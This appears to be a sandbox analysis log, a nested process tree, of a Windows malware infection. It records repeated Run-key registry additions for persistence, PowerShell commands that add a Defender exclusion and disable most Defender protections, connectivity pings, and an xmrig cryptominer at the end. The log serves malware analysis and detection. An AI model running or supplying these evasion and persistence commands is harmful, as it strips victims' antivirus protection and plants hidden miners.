                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                3⤵
                                                                                                                                                  PID:2684
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                    4⤵
                                                                                                                                                      PID:7172
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                        5⤵
                                                                                                                                                          PID:7044
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4880
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                        3⤵
                                                                                                                                                          PID:7920
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                            4⤵
                                                                                                                                                              PID:7944
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                              4⤵
                                                                                                                                                                PID:7936
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  CMD /C CALL echo y
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:7964
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:8028
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:8140
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:7152
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1224
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:7244
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1872
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:7320
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:7316
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4268
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:7588
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:4536
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:7820
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:7400
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6944
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:4880
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:7524
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:656
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:4076
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:4148
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:8020
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              CMD /C CALL echo y
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:8164
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1308
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:8160
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2236
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      CMD /C CALL echo y
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:4644
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:6488
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:6268
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:752
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:8028
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:7212
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:5156
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      CMD /C CALL echo y
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:7288
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:7192
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:7204
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:7432
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              CMD /C CALL echo y
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:6532
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:7356
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:7476
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:7352
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:7320
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5812
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:7236
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              CMD /C CALL echo y
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:7572
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:8180
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4188
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:6016
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      CMD /C CALL echo y
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:6112
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:6108
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:7496
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:6928
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:6940
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:7488
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:5196
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:2428
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:7216
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:4536
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8EB5.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8EB5.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3788
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:4020
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName facebook.com
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:2248
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName youtube.com
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:3800
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:4304
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:1776
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName outlook.com
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5724
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName bing.com
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:5392
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection -ComputerName google.com
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5660
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9221.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9221.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:4400
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:4076
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell Add-MpPreference -ExclusionExtension .exe -Force
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:4980
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              CMD /C CALL echo y
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:2308
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              "powershell" Get-MpPreference -verbose
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:6020
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5424
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:6152
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:6324
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:6400
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:6572
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:6720
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:6812
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:6900
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:6992
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:6988
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:6824
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:7180
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\xmrig.exe
